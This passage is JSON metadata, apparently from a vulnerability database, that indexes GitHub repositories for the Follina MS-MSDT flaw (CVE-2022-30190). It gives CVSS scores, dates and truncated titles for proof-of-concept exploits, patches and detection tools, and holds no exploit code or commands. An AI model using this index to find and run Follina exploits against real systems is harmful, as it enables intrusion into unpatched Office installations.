"integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-08-09T21:35:20", "id": "FD6B81DE-3BFF-5BC7-BD1F-E90103B8FBEF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T01:08:24", "description": "# CVE-2022-30190\n\nCVE-2022-30190\nCVE-2022-30190 Follina POC\n\nHos...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T07:01:19", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-26T14:55:24", "id": "9CB70E27-04CC-50BC-9F3E-2907ABA654EA", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T01:02:45", "description": "# Follina MS-MSDT exploitation with Spring Boot\n\nThis repository...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-07T22:46:23", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-17T23:25:27", "id": "B3146F3C-4919-564B-8B1E-752FCA30B8D9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-06T09:05:39", "description": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n <head>\r\n <meta htt...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-12-26T10:29:46", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-26T14:55:23", "id": "85BF1C0C-52A1-5413-8D04-253B6AC0B7CA", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-11T23:56:32", "description": "# FOLLINA-CVE-2022-30190\nImplementation of FOLLINA-CVE-2022-3019...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-03-14T07:00:47", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-26T14:55:35", "id": "6E70CDA8-57F7-5737-80B5-84D8D2254D9D", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:37:16", "description": "# CVE-2022-30190_EXP_PowerPoint\n\nThis is exploit of CVE-2022-301...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-29T08:48:12", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-16T21:54:49", "id": "E6B6EDFD-3B78-58CA-B507-093047F89BB1", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:39:17", "description": "# Follina-CVE-2022-30190-Unofficial-patch-\nAn Unofficial Patch F...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-13T04:20:02", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-16T21:54:22", "id": "5B74BEF9-0D39-5A60-8806-ABA55730878C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:42:37", "description": "# cve-2022-30190\nCVE-2022-30190 remediation via removal of ms-ms...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T23:32:33", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-16T21:54:01", "id": "71065DAD-91FD-5CFB-9F35-CA3E1837FF2C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:42:01", "description": "# MS-MSDT-Office-RCE-Follina\nCVE-2022-30190 | MS-MSDT Follina On...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T16:09:02", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-16T21:54:04", "id": "FCCAAA4B-646B-578D-8CE2-5439E7799C32", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T01:04:44", "description": "# Compromised clickstudio certificate\n\n__Extracted from__: f3ccf...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-09T10:03:06", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-09T10:06:44", "id": "1E1DD2F1-F609-5686-A0EF-1C08ACABF537", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T00:22:26", "description": "# CVE-2022-30190\n\n[![N|Solid](https://socprime.com/wp-content/up...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-04T19:48:37", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-16T21:54:07", "id": "BC3F41CB-4333-5CCE-85A9-7064DAA6019A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T00:50:41", "description": "# Follina-MSDT-Vulnerability-CVE-2022-30190-\nDetection and Remed...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-21T06:49:44", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-09-20T14:40:32", "id": "E51E8D61-BAA6-5098-9EEE-50DD18427F87", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:40:31", "description": "# Deathnote\n<p align=\"center\">\n \n<img src=\"https://media3.giphy....", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-08T10:58:23", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-16T21:54:14", "id": "70407390-C149-54F1-89B0-7611FB420601", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T00:47:28", "description": "# Five Nights at Follina's\nA Fullstack Academy Cybersecurity pro...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-01T16:47:50", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-05T16:10:38", "id": "A78746B7-318B-5981-A2EB-2D5BA5C26514", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T00:25:52", "description": "CVE-2022-30190\r\n\r\n# IMPORTANT\r\n\r\n## Patched as of:\r\nJu...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T16:14:13", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-02-14T18:19:06", "id": "2D9FF49E-AD93-5397-80B0-B02DED73DEA6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T00:54:13", "description": "# Follina-CVE-2022-30190 Proof of Concept by Nee\n\n## Usage\n```ba...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-05T13:54:04", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-02-09T18:20:51", "id": "66A7ADCB-1EAD-519B-9B1F-5694A2860BA1", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T00:54:04", "description": "# CVE-2022-30190_EXP_PowerPoint\n\nThis is exploit of CVE-2022-301...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-29T08:48:12", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-16T21:54:49", "id": "8AB79327-A57A-5D2D-830F-F7DAA97B76AA", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-12T00:55:33", "description": "# Follina-CVE-2022-30190-Sample-by-ethical-blue\n Educational Fol...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-25T16:27:59", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-01T22:51:35", "id": "37F78533-E96A-5433-B558-90DB82C0BB27", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-11T23:39:17", "description": "# CVE 30190\n\n> Amine TITROFINE | December 17, 2022\n\n------------...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-05-14T13:38:43", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-26T14:55:34", "id": "B49D93D1-E77A-5CAA-8DAC-BC353782D5A7", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T23:09:18", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T18:17:38", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-18T07:34:31", "id": 